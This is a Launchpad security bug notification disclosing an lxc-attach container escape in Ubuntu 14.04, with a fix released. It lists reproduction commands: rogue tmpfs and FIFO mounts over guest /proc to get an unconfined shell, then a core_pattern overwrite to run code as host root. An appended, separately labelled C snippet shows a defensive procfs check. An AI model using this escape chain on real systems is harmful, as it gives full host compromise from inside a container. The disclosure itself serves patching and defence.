** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1475050
Title:
  unprivileged guest to host real-root escape via lxc-attach

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found that lxc-attach
  attempts to read guest mount namespace /proc entries before confining to
  the new apparmor policy and dropping host uid/gid. By unmounting /proc
  within the guest as root and replacing it with a rogue version,
  lxc-attach fails to apply the new security policy and also to apply
  PR_SET_SECCOMP. Therefore getting an "unconfined" apparmor profile
  requires only a single invocation of lxc-attach. The unconfined settings
  already allow bind mounts, pivot_root and some other quite powerful
  syscalls, so a second round of lxc-attach might not be needed. Currently
  the second round uses a host guest uid=0 process to attach to a real
  euid=0 process to escalate then to full host root privileges, e.g. via
  modifying /proc/sys/kernel/core_pattern and triggering a core dump.

  Steps to reproduce:

  Get unconfined:
  ===============

  * Use SSH to get an arbitrary number of unconfined sessions, just a
    convenience for testing:

      apt-get install openssh-server
      stop ssh
      Edit /etc/ssh/sshd_config to allow password login
      Set root password

  * Prepare to lock the next lxc-attach to get "unconfined":

      mount -t tmpfs tmpfs /proc/1
      mknod /proc/1/status p

  * Replace /bin/sh or link it to sshd instead; for testing call it
    directly:

      lxc-attach --name testguest /usr/sbin/sshd

  * In guest make apparmor fail by a second tmpfs mount:

      ps aux | grep lxc-attach
      pid=554
      mount -t tmpfs tmpfs "/proc/${pid}/attr"
      touch "/proc/${pid}/attr/current"
      chmod 0666 "/proc/${pid}/attr/current"
      echo "" > /proc/1/status

  * Use the unconfined shells:

      # cat /proc/self/attr/current
      lxc-container-default (enforce)
      # ssh root@localhost
      ...
      # cat /proc/self/attr/current
      unconfined

  * Wait for the next lxc-attach, use unconfined to escape:

      lxc-attach --name testguest /bin/true

    In guest:

      cat <<EOF > /escape
      #!/bin/sh
      echo "|/bin/sh -c /var/lib/lxc/*/rootfs/escape2" > /proc/sys/kernel/core_pattern
      EOF
      chmod 0755 /escape
      cat <<EOF > /escape2
      #!/bin/sh
      touch /this-should-be-on-outside
      EOF
      chmod 0755 /escape2
      ps aux | grep lxc-attach
      /root/Testing/PtraceHelper 2688
      ulimit -c unlimited
      sleep 100 &
      kill -SEGV 3030

  Affected system:

      # lsb_release -rd
      Description:    Ubuntu 14.04.2 LTS
      Release:        14.04
      # apt-cache policy lxc
      lxc:
        Installed: (none)
        Candidate: 1.0.7-0ubuntu0.1
        Version table:
           1.0.7-0ubuntu0.1 0
              500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages
           1.0.3-0ubuntu3 0
              500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
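As an added defensive example (not lxc's own code and not the fix that shipped for this bug), the kind of check a privileged caller should perform before reading or writing a /proc entry that an unprivileged guest controls: open it without blocking, then confirm it is a regular file on procfs rather than something mounted over it. The function names, the temp directory and the FIFO (standing in for the /proc/1/status pipe from the steps above) are assumptions of this example.

```c
/* Added example, not lxc's own code: before trusting a /proc/<pid>/...
 * entry reached across a namespace boundary, verify that it is a regular
 * file backed by procfs. The report above defeats lxc-attach with a tmpfs
 * over /proc/1 and a FIFO at /proc/1/status; both are rejected here. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/vfs.h>
#include <unistd.h>
#include <linux/magic.h>

/* Returns 1 if path is a regular file on procfs, 0 otherwise. */
int proc_path_is_trusted(const char *path)
{
    struct stat st;
    struct statfs sfs;
    int ok = 0;
    /* O_NONBLOCK: opening a FIFO with no writer must not hang the caller
     * (the report relies on exactly that hang). O_NOFOLLOW: no symlinks. */
    int fd = open(path, O_RDONLY | O_NONBLOCK | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return 0;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) &&
        fstatfs(fd, &sfs) == 0 && sfs.f_type == PROC_SUPER_MAGIC)
        ok = 1;
    close(fd);
    return ok;
}

/* Constructed negative case: a FIFO in a temp directory stands in for the
 * rogue /proc/1/status from the report. Returns 1 if it was rejected. */
int fifo_is_rejected(void)
{
    char dir[] = "/tmp/procchk.XXXXXX";   /* constructed, hypothetical path */
    char fifo[64];
    int rejected;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(fifo, sizeof fifo, "%s/status", dir);
    if (mkfifo(fifo, 0600) != 0) { rmdir(dir); return 0; }
    rejected = !proc_path_is_trusted(fifo);
    unlink(fifo);
    rmdir(dir);
    return rejected;
}

int main(void)
{
    printf("/proc/self/status trusted=%d, fifo rejected=%d\n",
           proc_path_is_trusted("/proc/self/status"), fifo_is_rejected());
    return 0;
}
```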